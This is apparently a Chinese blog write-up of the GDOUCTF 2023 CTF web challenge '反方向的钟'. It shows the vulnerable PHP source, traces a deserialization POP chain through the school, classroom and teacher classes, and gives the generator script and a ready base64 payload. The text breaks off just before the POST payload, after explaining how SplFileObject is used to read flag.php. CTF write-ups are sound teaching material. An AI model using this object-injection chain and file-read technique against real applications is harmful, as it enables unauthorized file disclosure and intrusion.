[GDOUCTF 2023]反方向的钟

最新推荐文章于 2024-08-19 21:44:56 发布

Sharpery

最新推荐文章于 2024-08-19 21:44:56 发布

阅读量783

点赞数 2

分类专栏： web ctf 文章标签： web

本文链接：https://blog.csdn.net/qq_73767109/article/details/131034853

版权

ctf 同时被 2 个专栏收录

22 篇文章 0 订阅

订阅专栏

web

21 篇文章 0 订阅

订阅专栏

<?php
error_reporting(0);
highlight_file(__FILE__);
// flag.php
class teacher{
    public $name;
    public $rank;
    private $salary;
    public function __construct($name,$rank,$salary = 10000){
        $this->name = $name;
        $this->rank = $rank;
        $this->salary = $salary;
    }
}

class classroom{
    public $name;
    public $leader;
    public function __construct($name,$leader){
        $this->name = $name;
        $this->leader = $leader;
    }
    public function hahaha(){
        if($this->name != 'one class' or $this->leader->name != 'ing' or $this->leader->rank !='department'){
            return False;
        }
        else{
            return True;
        }
    }
}

class school{
    public $department;
    public $headmaster;
    public function __construct($department,$ceo){
        $this->department = $department;
        $this->headmaster = $ceo;
    }
    public function IPO(){
        if($this->headmaster == 'ong'){
            echo "Pretty Good ! Ctfer!\n";
            echo new $_POST['a']($_POST['b']);
        }
    }
    public function __wakeup(){
        if($this->department->hahaha()) {
            $this->IPO();
        }
    }
}

if(isset($_GET['d'])){
    unserialize(base64_decode($_GET['d']));
}
?>

先观察代码中可以实现命令执行的地方

可以看到只有

echo new $_POST['a']($_POST['b']);

能利用原生类SplFileObject读取文件

所以目标点加上school类中的IPO方法

IPO需要在wakeup中调用,而

if($this->department->hahaha()) {
            $this->IPO();
        }

返回为真的时候调用，这样又要看到dapartment调用hahaha

hahaha是classroom的一个方法,所以这里要实例化classroom赋给dapartment

public function hahaha(){
        if($this->name != 'one class' or $this->leader->name != 'ing' or $this->leader->rank !='department'){
            return False;
        }
        else{
            return True;
        }
    }

hahaha返回true三个变量相等其中后面两个变量明显是一个对象中的name和rank变量

有这两个变量的只有teacher类，所以要实例化该类并赋值给leader

最后就是在teacher类中赋值name和rank即可

大致的链子为:

school::__wakeup()–>classroom::hahaha()–>school::IPO()

构造pop:

<?php
error_reporting(0);
class teacher{
    public $name;
    public $rank;
    private $salary;
    public function __construct($name,$rank,$salary = 10000){
        $this->name = $name;
        $this->rank = $rank;
        $this->salary = $salary;
    }
}

class classroom{
    public $name;
    public $leader;
    public function __construct($name,$leader){
        $this->name = $name;
        $this->leader = $leader;
    }
    public function hahaha(){
        if($this->name != 'one class' or $this->leader->name != 'ing' or $this->leader->rank !='department'){
            return False;
        }
        else{
            return True;
        }
    }
}

class school{
    public $department;
    public $headmaster;
    public function __construct($department,$ceo){
        $this->department = $department;
        $this->headmaster = $ceo;
    }
    public function IPO(){
        if($this->headmaster == 'ong'){
            echo "Pretty Good ! Ctfer!\n";
            echo new $_POST['a']($_POST['b']);
        }
    }
    public function __wakeup(){
        if($this->department->hahaha()) {
            $this->IPO();
        }
    }
}

$a=new school(new classroom("one class",new teacher("ing","department")),"ong");

echo urlencode(base64_encode(serialize($a)));
?>

得到get参数的payload为:

d=Tzo2OiJzY2hvb2wiOjI6e3M6MTA6ImRlcGFydG1lbnQiO086OToiY2xhc3Nyb29tIjoyOntzOjQ6Im5hbWUiO3M6OToib25lIGNsYXNzIjtzOjY6ImxlYWRlciI7Tzo3OiJ0ZWFjaGVyIjozOntzOjQ6Im5hbWUiO3M6MzoiaW5nIjtzOjQ6InJhbmsiO3M6MTA6ImRlcGFydG1lbnQiO3M6MTU6IgB0ZWFjaGVyAHNhbGFyeSI7aToxMDAwMDt9fXM6MTA6ImhlYWRtYXN0ZXIiO3M6Mzoib25nIjt9

之后利用原生类SplFileObject读取文件

a为类,b用php协议读取flag.php /代码中说了flag在flag.php中

所以POST的payload为: